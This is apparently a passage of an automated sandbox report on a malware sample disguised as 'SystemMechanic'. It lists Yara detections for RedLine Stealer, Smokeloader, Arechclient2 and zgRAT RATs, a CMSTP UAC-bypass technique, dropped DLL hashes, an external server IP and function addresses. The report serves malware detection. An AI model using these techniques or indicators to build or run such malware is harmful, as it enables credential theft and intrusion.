Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443

Source: unknown

HTTPS traffic detected: 195.181.163.193:443 -> 192.168.2.4:49752 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe

Code function: 2_2_0018C8B0 GetClientRect,GetDC,CreateCompatibleBitmap,GetDC,CreateCompatibleDC,BitBlt,

2_2_0018C8B0

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.run.exe.26ccd5b.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.run.exe.3e1e15b.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 4.2.cmd.exe.580fe64.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 21.2.cmd.exe.4b5c264.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 4.2.cmd.exe.62500c8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 21.2.cmd.exe.51400c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 21.2.cmd.exe.51400c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 2.2.run.exe.26cc15b.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 4.2.cmd.exe.57cb976.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 2.2.run.exe.268886d.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 4.2.cmd.exe.62500c8.8.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272100c6ca8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 20.2.run.exe.3dda86d.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 4.2.cmd.exe.580f264.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 21.2.cmd.exe.4b5ce64.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.run.exe.3e1ed5b.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 21.2.cmd.exe.4b18976.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b94dad.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ed432f.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b847a3.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ead525.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ef8739.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b7537d.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000001.00000002.2160863373.00000000042D4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000002.2160554366.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1985953400.00000000040F5000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: C:\Users\user\AppData\Local\Temp\xtfky, type: DROPPED	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\jwjqeqx, type: DROPPED	Matched rule: Detects Arechclient2 RAT Author: ditekSHen

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB7F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	1_2_6BB7F280
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBDB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	1_2_6BBDB910
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBDB8C0 rand_s,NtQueryVirtualMemory,	1_2_6BBDB8C0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBDB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	1_2_6BBDB700
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB9ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	1_2_6BB9ED10

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_00427880	0_2_00427880
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_0040B8AE	0_2_0040B8AE
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_0040C191	0_2_0040C191
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_004123A0	0_2_004123A0
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_0040F441	0_2_0040F441
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_0040C44C	0_2_0040C44C
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_0042140C	0_2_0042140C
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_0040BC20	0_2_0040BC20
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_0041BE39	0_2_0041BE39
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_0040BECA	0_2_0040BECA
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_00408761	0_2_00408761
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_0041B722	0_2_0041B722
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_0040C7FC	0_2_0040C7FC
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_05B6C6B3	0_2_05B6C6B3
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_05B6F6A8	0_2_05B6F6A8
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_05B6BE87	0_2_05B6BE87
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_05B72607	0_2_05B72607
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_05B7B989	0_2_05B7B989
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_05B689C8	0_2_05B689C8
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_05B6C131	0_2_05B6C131
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_05B6C3F8	0_2_05B6C3F8
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_05B6BB15	0_2_05B6BB15
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_05B6CA63	0_2_05B6CA63
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB735A0	1_2_6BB735A0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB7F380	1_2_6BB7F380
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBE53C8	1_2_6BBE53C8
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBBD320	1_2_6BBBD320
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB8C370	1_2_6BB8C370
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB75340	1_2_6BB75340
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB8CAB0	1_2_6BB8CAB0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBE2AB0	1_2_6BBE2AB0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB722A0	1_2_6BB722A0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBA4AA0	1_2_6BBA4AA0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBEBA90	1_2_6BBEBA90
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB91AF0	1_2_6BB91AF0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBBE2F0	1_2_6BBBE2F0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBB8AC0	1_2_6BBB8AC0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBB9A60	1_2_6BBB9A60
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBAD9B0	1_2_6BBAD9B0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB7C9A0	1_2_6BB7C9A0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBB5190	1_2_6BBB5190
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBD2990	1_2_6BBD2990
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBCB970	1_2_6BBCB970
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBEB170	1_2_6BBEB170
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB8D960	1_2_6BB8D960
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB9A940	1_2_6BB9A940
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBA60A0	1_2_6BBA60A0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB9C0E0	1_2_6BB9C0E0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBB58E0	1_2_6BBB58E0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBE50C7	1_2_6BBE50C7
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBBB820	1_2_6BBBB820
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBC4820	1_2_6BBC4820
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB87810	1_2_6BB87810
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBBF070	1_2_6BBBF070
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB98850	1_2_6BB98850
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB9D850	1_2_6BB9D850
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBC77A0	1_2_6BBC77A0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBA6FF0	1_2_6BBA6FF0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB7DFE0	1_2_6BB7DFE0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBB7710	1_2_6BBB7710
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB89F00	1_2_6BB89F00
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBD4EA0	1_2_6BBD4EA0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB95E90	1_2_6BB95E90
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBDE680	1_2_6BBDE680
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB7BEF0	1_2_6BB7BEF0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB8FEF0	1_2_6BB8FEF0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBE76E3	1_2_6BBE76E3
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBD9E30	1_2_6BBD9E30
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBB7E10	1_2_6BBB7E10
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBC5600	1_2_6BBC5600
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB7C670	1_2_6BB7C670
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBE6E63	1_2_6BBE6E63
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB99E50	1_2_6BB99E50
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBB3E50	1_2_6BBB3E50
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBC2E4E	1_2_6BBC2E4E
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB94640	1_2_6BB94640
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBD85F0	1_2_6BBD85F0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBB0DD0	1_2_6BBB0DD0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBA0512	1_2_6BBA0512
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB9ED10	1_2_6BB9ED10
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB8FD00	1_2_6BB8FD00
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBD34A0	1_2_6BBD34A0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBDC4A0	1_2_6BBDC4A0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB86C80	1_2_6BB86C80
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBB6CF0	1_2_6BBB6CF0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB7D4E0	1_2_6BB7D4E0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB9D4D0	1_2_6BB9D4D0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB864C0	1_2_6BB864C0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBE542B	1_2_6BBE542B
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBB5C10	1_2_6BBB5C10
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBC2C10	1_2_6BBC2C10
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBEAC00	1_2_6BBEAC00
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBE545C	1_2_6BBE545C
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB85440	1_2_6BB85440
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C85ECD0	1_2_6C85ECD0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C8C6C00	1_2_6C8C6C00
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C8DAC30	1_2_6C8DAC30
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C7FECC0	1_2_6C7FECC0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C80AC60	1_2_6C80AC60
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C896D90	1_2_6C896D90
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C804DB0	1_2_6C804DB0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C98CDC0	1_2_6C98CDC0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C988D20	1_2_6C988D20
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C92AD50	1_2_6C92AD50
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C8CED70	1_2_6C8CED70
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C886E90	1_2_6C886E90
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C80AEC0	1_2_6C80AEC0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C8A0EC0	1_2_6C8A0EC0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C8E0E20	1_2_6C8E0E20
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C89EE70	1_2_6C89EE70
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C948FB0	1_2_6C948FB0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C80EFB0	1_2_6C80EFB0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C800FE0	1_2_6C800FE0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C8DEFF0	1_2_6C8DEFF0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C806F10	1_2_6C806F10
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C940F20	1_2_6C940F20
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C86EF40	1_2_6C86EF40
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C8C2F70	1_2_6C8C2F70
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C9068E0	1_2_6C9068E0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C850820	1_2_6C850820
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C88A820	1_2_6C88A820
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C8D4840	1_2_6C8D4840
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C8909A0	1_2_6C8909A0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C8BA9A0	1_2_6C8BA9A0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C8C09B0	1_2_6C8C09B0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C91C9E0	1_2_6C91C9E0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C8349F0	1_2_6C8349F0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C856900	1_2_6C856900
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_0018F840	2_2_0018F840
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_00174060	2_2_00174060
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_00196130	2_2_00196130
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_00172120	2_2_00172120
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_0018B150	2_2_0018B150
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_001C9A00	2_2_001C9A00
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_001BCAA0	2_2_001BCAA0
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_00184390	2_2_00184390
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_00190390	2_2_00190390
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_0019FC10	2_2_0019FC10
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_001C5550	2_2_001C5550
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_0017D570	2_2_0017D570
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_0017A6F0	2_2_0017A6F0
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_001966F0	2_2_001966F0
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_001C96E0	2_2_001C96E0
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_001737B0	2_2_001737B0

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: String function: 6BBACBE8 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: String function: 004043B0 appears 316 times
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: String function: 6C9809D0 appears 79 times
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: String function: 6BBB94D0 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: String function: 002F9D36 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: String function: 001714F0 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: String function: 00171930 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: String function: 00171900 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: String function: 00171310 appears 36 times
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: String function: 05B69F27 appears 48 times
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: String function: 05B87A73 appears 43 times
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: String function: 00409CC0 appears 48 times
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: String function: 0042780C appears 43 times

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 1564

Source: wxfSIz4PAi.exe, 00000000.00000002.1986225613.000000000415E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFirezer0 vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1779362070.0000000005E0D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1780069248.0000000005E17000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1779989651.0000000005E35000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000002.1986931199.0000000005DB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameL vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1778778577.0000000005E12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1780363019.0000000005E1A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1767099442.0000000005E1C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1779706240.0000000005E35000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \OriginalFileName vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1773466562.0000000005E27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1779826045.0000000005E01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000002.1985478650.0000000004048000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFirezer0 vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1663398442.0000000005D9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFirezer0 vs wxfSIz4PAi.exe
